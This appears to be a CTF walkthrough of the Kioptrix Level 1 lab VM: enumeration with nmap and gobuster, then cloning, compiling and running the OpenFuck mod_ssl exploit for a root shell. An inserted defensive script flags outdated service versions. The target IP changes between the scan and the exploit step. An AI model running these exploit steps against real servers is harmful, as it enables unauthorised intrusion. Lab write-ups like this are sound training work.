Kioptrix: Level 1 (#1) Walkthrough
--
Vulnhub is a platform that provides VM (virtual machine) images which are vulnerable by design and help you gain practical hands-on experience in pentesting.
Kioptrix is a series of CTF (Capture The Flag) like VMs, where you need to gain root privileges on the machine. Kioptrix is a boot2root machine.
Link to the image file:
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Enumeration:
So, now we need to know the internal IP address of the Kioptrix machine, so we run the following command in the terminal:
netdiscover
Nmap Scan:
nmap -sC -sV 192.168.0.102
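From a defender's side, the foothold in this walkthrough comes entirely from the service versions that the nmap scan reveals. The following Python script is an added example, not from the original post: it parses `nmap -sV` style output (a constructed sample, not the real scan result) and flags any Apache, mod_ssl, OpenSSL or OpenSSH version below an assumed minimum baseline; the baseline numbers are placeholders to be taken from your own patch policy.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of `nmap -sV` normal output; NOT the walkthrough's real scan result.
SAMPLE_NMAP_OUTPUT = """\
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp  open  http        Apache httpd 1.3.12 ((Unix) (Red-Hat/Linux) mod_ssl/2.6.4 OpenSSL/0.9.5a)
443/tcp open  ssl/https   Apache/1.3.12 (Unix) (Red-Hat/Linux) mod_ssl/2.6.4 OpenSSL/0.9.5a
"""

# Assumed placeholder baseline: anything older than this is reported. Replace with
# the minimum patched versions from your own policy; these are illustrative only.
MINIMUM_VERSIONS: Dict[str, str] = {
    "apache": "1.3.27",
    "mod_ssl": "2.8.12",
    "openssl": "0.9.6e",
    "openssh": "3.4p1",
}

# Product name followed by "/" or " " and a version token such as 1.3.12, 0.9.5a or 2.9p2.
PRODUCT_RE = re.compile(r"(Apache(?: httpd)?|mod_ssl|OpenSSL|OpenSSH)[/ ]([0-9][0-9a-z.]*)")
PORT_LINE_RE = re.compile(r"(\d+)/(tcp|udp)\s+open\s+(\S+)\s+(.*)")


def parse_version(version: str) -> Tuple[Tuple[int, str], ...]:
    """Split '0.9.5a' into ((0,''), (9,''), (5,'a')) so tuples compare in release order."""
    parts = []
    for piece in version.split("."):
        m = re.match(r"(\d+)([a-z]*)", piece)
        if not m:
            break
        parts.append((int(m.group(1)), m.group(2)))
    return tuple(parts)


def audit_nmap_output(text: str, baseline: Dict[str, str]) -> List[Dict[str, str]]:
    """Return one finding per (port, product) whose banner version is below the baseline."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = PORT_LINE_RE.match(line)
        if not m:
            continue  # header lines and closed/filtered ports carry no banner
        port, proto, _service, banner = m.groups()
        for product, version in PRODUCT_RE.findall(banner):
            key = product.lower().replace(" httpd", "")
            if key in baseline and parse_version(version) < parse_version(baseline[key]):
                findings.append({"port": f"{port}/{proto}", "product": key,
                                 "version": version, "minimum": baseline[key]})
    return findings


if __name__ == "__main__":
    for f in audit_nmap_output(SAMPLE_NMAP_OUTPUT, MINIMUM_VERSIONS):
        print(f"{f['port']}: {f['product']} {f['version']} is below baseline {f['minimum']}")
```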
Port 22:
We tried SSH but didn't succeed, as it's asking for a password, so let's enumerate further. Later we shall also try brute-forcing SSH using "Hydra".
Port 80:
Visiting the webpage we see a default Apache Test page.
http://192.168.0.102:80
So, let's run Gobuster in the background and search for hidden directories (the wordlist path contains a space, so it has to be quoted):
gobuster dir -u http://192.168.0.102 -w "/opt/DirBuster Lists/directory-list-2.3-medium.txt"
But we didn't find any interesting directories. :(
Port 443:
While visiting the page it shows us:
As port 443 is used for HTTPS (Hyper Text Transfer Protocol Secure), we need to add "https://" in the URL section.
Searching on Google for exploits for this Apache version:
We find a publicly available exploit on Exploit-DB.
The note section (1st line) of that exploit directs us to the updated exploit.
The link to the updated exploit:
https://www.exploit-db.com/exploits/47080
But the updated exploit also needs some corrections to its code before it compiles.
There is a working version of the exploit on GitHub.
https://github.com/exploit-inters/OpenFuck
EXPLOITATION:
Let's git clone the repository.
git clone https://github.com/heltonWernik/OpenFuck.git
Now we need to install the dependent library for the exploit.
apt-get install libssl-dev
After cloning, let's move into the directory and see its contents:
cd OpenFuck/
It's compile time:
gcc -o exploit OpenFuck.c -lcrypto
gcc: the GNU Compiler Collection, used to compile programs written in C and C++
-o: the file name to place the output into
-lcrypto: links against the OpenSSL crypto library installed above (libssl-dev)
It's time to run the exploit:
./exploit
Run without arguments, the exploit lists the various versions of the Apache server and operating system it supports. From our nmap scan we know our target's OS and Apache service version.
Each listed version has a corresponding label (an offset value).
So our label on the given services is “0x6b”
Let's run the exploit with the specified label:
./exploit 0x6b 192.168.80.145 443 -c 40
Hurray! We got the shell.
id
And we are already root.
So, this was a beginner boot2root machine of the Kioptrix series. Gaining root on the machine releases "dopamine", which makes you happy and motivated to solve the next VMs too. This kind of spirit and motivation is needed every day in order to grow in the infosec field, as this field is all about learning each day.